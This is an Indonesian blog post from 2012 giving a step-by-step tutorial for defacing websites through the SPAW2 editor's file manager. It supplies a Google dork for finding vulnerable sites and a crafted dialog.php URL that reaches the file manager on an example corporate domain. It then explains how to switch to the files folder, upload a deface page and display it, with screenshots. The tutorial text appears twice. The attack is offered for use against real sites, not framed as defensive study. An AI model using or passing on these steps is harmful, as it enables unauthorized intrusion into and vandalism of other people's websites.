google dork : inurl:"spaw2/uploads/files/"
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sw2KGJZMnsV4JXzn2ped1-ZQa8H59Z-5Ytd9xRxjl_D0KJc12y563VyBB8EPpFnMqNLMsS5mlo4Sz4hO9UJpFI65F9Y-FA1lDp1HerW3TQXfZW4_OY5X5e-JS7F4BZAemmt2YJkeRerAzMJn4VMKHs8qqsbpx8L2_yxOrhCfSTuNAsLwndl003Yzg=s0-d)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t1N3jwybuu9JunPnqx2zLvoBaRzD4bgJOMX6-lDk3aZdkQN8l3tqeR94yW9D9r7bk7Rn0IDNKEy6srHJMFWhEUiYD3_MeN6WyCmyZ0L8p5OD9-WhIlWTzXFbdzLpd9IO8NognAdtm_xi2wF1XAOgjIFduY8Ukp4l4EJowXBsvVUB7SYtqejpZ4OFsH=s0-d)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u5RsZUyCrJ8qfA8tP2i9fb3Li85Y7v_fpC6H3nAgNhtD4GNubxgjDIa8qOpDvbFPWOWV6sgopIjliXecNXwPXGcanZL-26Yzj8eRiG2JiXc8-c1xlN3QYp8pnWiQXO6XZ1FsurpHa9J-YsSqBjXiAp5hry3WXZTaV1a5n4ZmhFzDRbE6Tenx8Ps2yF=s0-d)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tkmepH3GKuKRh4-b_EKX3q_AWlUzMrH5iqaAJimwYo6ul8yP-dodxHOs8V8FyBPUtzgTZ14cMP0cMbQyzYIk-Al-3TeG8AdgT7FXrN4joJr9rIDg07eoU4zPErU8x8lwKXJVpQDiVW2xVj-L8ks_DmY-EkwBYgzd3r-4U_9Qtuz7jeRvyvJA9_7Scy=s0-d)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t6EMY9_mUaznsYOL15wC95YA1LYk9-l86i_4NRGkIjdmOeBQKdFNspPbKkYlAcNwQCKBCZo_vrakX0OtsNGKxpwvLl5Hd2ITB2OehuUxcNqILF1FXw2Sfe_pbTgEq7J40bKKhH0acUYd-CNo5xuEJ07fWIMULmkdYk_Ta76CC_4S-IFfDp-GyrvNwe=s0-d)
semoga sukses
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
kemudian upload
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
dan berikut hasil dari kerjaan diatas td :)
semoga sukses
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul Tutorial Deface asp. Anda bisa bookmark halaman ini dengan URL https://catatan-lutfi.blogspot.com/2012/07/tutorial-deface-asp.html. Terima kasih!
Ditulis oleh:
Lutfi rahman - Selasa, 17 Juli 2012
Belum ada komentar untuk "Tutorial Deface asp"
Posting Komentar